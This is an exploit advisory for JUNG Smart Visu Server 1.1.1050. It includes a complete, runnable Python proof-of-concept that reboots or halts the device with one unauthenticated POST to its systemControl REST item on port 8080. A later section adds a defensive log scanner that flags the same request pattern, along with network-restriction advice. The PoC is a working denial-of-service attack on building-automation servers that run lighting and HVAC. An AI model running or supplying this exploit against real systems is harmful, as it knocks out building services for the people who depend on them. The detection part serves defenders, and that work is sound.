=============================================================================================================================================
| # Title : JUNG Smart Visu Server 1.1.1050 - Unauthenticated Remote Denial of Service |
| # Author : indoushka |
| # Tested on : Windows 11 Fr(Pro) / browser : Mozilla Firefox 147.0.3 (64 bits) |
| # Vendor : https://www.jung-group.com/en-DE |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/215521/ & ZSL-2026-5971
[+] Summary : JUNG Smart Visu Server version 1.1.1050 allows unauthenticated remote attackers to reboot or halt the device with a single crafted HTTP POST request to an exposed REST API endpoint.
The affected item, /rest/items/liteserver_LiteServer_1_systemControl, accepts a JSON body whose MSG_ID_TYPE selects the system command (MSG_REBOOT_REQ or MSG_HALT_REQ) and enforces neither authentication nor authorization, so system control commands execute directly for anyone who can reach the service.
An attacker with network access to the device (default TCP port 8080) needs only one request to disrupt availability, resulting in a denial of service (DoS). Note that the PoC below has no non-destructive probe: every request it sends restarts or halts the target, so run it only against a unit you are allowed to take down.
Successful exploitation causes a service interruption in building automation environments, potentially affecting lighting, HVAC, and other systems controlled through the server.
[+] POC :
#!/usr/bin/env python3
import requests
import sys
import argparse

# REST item that accepts system control messages without any authentication
ENDPOINT = "/rest/items/liteserver_LiteServer_1_systemControl"
HEADERS = {
    "User-Agent": "thricer-engine/1.6",
    "Content-Type": "application/json"
}
# Message IDs understood by the systemControl item; either one takes the device down
COMMANDS = {
    "reboot": '{"MSG_ID_TYPE":"MSG_REBOOT_REQ"}',
    "shutdown": '{"MSG_ID_TYPE":"MSG_HALT_REQ"}'
}


def exploit(target_ip, command_type):
    """
    Sends the malicious request to the target server.
    A single unauthenticated POST is enough; no session or credentials are needed.
    """
    url = f"http://{target_ip}:8080{ENDPOINT}"
    payload = COMMANDS.get(command_type)
    if not payload:
        print("[!] Invalid command type. Use 'reboot' or 'shutdown'.")
        sys.exit(1)
    print(f"[*] Targeting: {url}")
    print(f"[*] Command: {command_type.upper()}")
    print("[*] Sending malicious packet...")
    try:
        response = requests.post(url, headers=HEADERS, data=payload, timeout=5)
        if response.status_code == 200:
            print("[+] Request sent successfully!")
            print("[+] If the device is connected, it should be rebooting/shutting down now.")
        else:
            print(f"[?] Unexpected server response: Status Code {response.status_code}")
            print("[?] The device might already be down or unaffected.")
    except requests.exceptions.ConnectionError:
        # The server may drop the connection while it goes down
        print("[!] Connection to server failed. Ensure it is running and the IP is correct.")
    except requests.exceptions.Timeout:
        print("[!] Request timed out. The server might have already been shut down.")
    except Exception as e:
        print(f"[!] An unexpected error occurred: {e}")


def banner():
    print("""
╔══════════════════════════════════════════════════════════════╗
║  JUNG Smart Visu Server 1.1.1050 - DoS Exploit               ║
║  by indoushka                                                ║
╚══════════════════════════════════════════════════════════════╝
""")


if __name__ == "__main__":
    banner()
    parser = argparse.ArgumentParser(description="DoS exploit for JUNG Smart Visu Server.")
    parser.add_argument("target", help="The target server IP address (e.g., 192.168.1.100)")
    parser.add_argument("action", choices=["reboot", "shutdown"],
                        help="The action to perform: 'reboot' to restart, 'shutdown' to stop.")
    args = parser.parse_args()
    exploit(args.target, args.action)
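[+] Detection note : The following Python is an added example for this advisory and is not part of the original PoC or of the vendor's software. It flags the request pattern used above (an HTTP POST to the systemControl item whose JSON body carries MSG_REBOOT_REQ or MSG_HALT_REQ) in access-log records, so a defender fronting the server with a reverse proxy or capturing its traffic can spot attempts. The one-record-per-line log layout, the LINE_RE pattern and every sample record are constructed for the example; only the item path and the two message IDs come from the PoC.

```python
#!/usr/bin/env python3
"""Flag unauthenticated systemControl reboot/halt requests in HTTP log records.

Added example for the JUNG Smart Visu Server advisory; not the vendor's code
and not part of the original PoC. The log format below is an assumption.
"""
import json
import re
from dataclasses import dataclass

# Item path and message IDs as used by the PoC in this advisory
SYSTEM_CONTROL_PATH = "/rest/items/liteserver_LiteServer_1_systemControl"
DANGEROUS_MSG_IDS = {"MSG_REBOOT_REQ", "MSG_HALT_REQ"}

# Assumed record layout (constructed for this example):
#   <src_ip> <METHOD> <path> <status> <request body or "-">
# The body is the last field and may contain spaces.
LINE_RE = re.compile(
    r"^(?P<src>\S+) (?P<method>[A-Z]+) (?P<path>\S+) (?P<status>\d{3}) (?P<body>.*)$"
)

# Constructed sample records: two real hits, plus decoys that must not fire
SAMPLE_LOG = """\
10.0.0.5 GET /rest/items/liteserver_LiteServer_1_systemControl 200 -
10.0.0.5 POST /rest/items/liteserver_LiteServer_1_systemControl 200 {"MSG_ID_TYPE":"MSG_REBOOT_REQ"}
10.0.0.9 POST /rest/items/some_other_item 200 {"MSG_ID_TYPE":"MSG_REBOOT_REQ"}
203.0.113.7 POST /rest/items/liteserver_LiteServer_1_systemControl/ 200 {"MSG_ID_TYPE": "MSG_HALT_REQ"}
10.0.0.5 POST /rest/items/liteserver_LiteServer_1_systemControl 200 not-json
10.0.0.5 POST /rest/items/liteserver_LiteServer_1_systemControl 200 {"state":"ON"}
"""


@dataclass
class Finding:
    src: str
    path: str
    msg_id: str
    status: int


def parse_body(raw):
    """Return the JSON object in the body, or None if it is not a JSON object."""
    try:
        data = json.loads(raw)
    except (json.JSONDecodeError, TypeError):
        return None
    return data if isinstance(data, dict) else None


def normalize_path(path):
    """Strip a query string and trailing slash so trivial variants still match."""
    return path.split("?", 1)[0].rstrip("/")


def scan(lines):
    """Return one Finding per record that matches the reboot/halt request pattern."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line.rstrip("\n"))
        if not m or m["method"] != "POST":
            continue
        path = normalize_path(m["path"])
        if path != SYSTEM_CONTROL_PATH:
            continue
        data = parse_body(m["body"])
        msg_id = data.get("MSG_ID_TYPE") if data else None
        if msg_id in DANGEROUS_MSG_IDS:
            findings.append(Finding(m["src"], path, msg_id, int(m["status"])))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG.splitlines()):
        print(f"[!] {f.src} sent {f.msg_id} to {f.path} (HTTP {f.status})")
```

Running the block against the constructed records reports the MSG_REBOOT_REQ request from 10.0.0.5 and the MSG_HALT_REQ request from 203.0.113.7 and ignores the GET, the other item, the non-JSON body and the harmless JSON body. Adapt LINE_RE to whatever your proxy or sensor actually records; the decisive fields are the POST method, the item path and the MSG_ID_TYPE value. Because the server itself does not require credentials for this item, restricting which hosts can reach TCP/8080 on the device is what limits exposure; logging only tells you after the fact.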
Greetings to :======================================================================
jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|
====================================================================================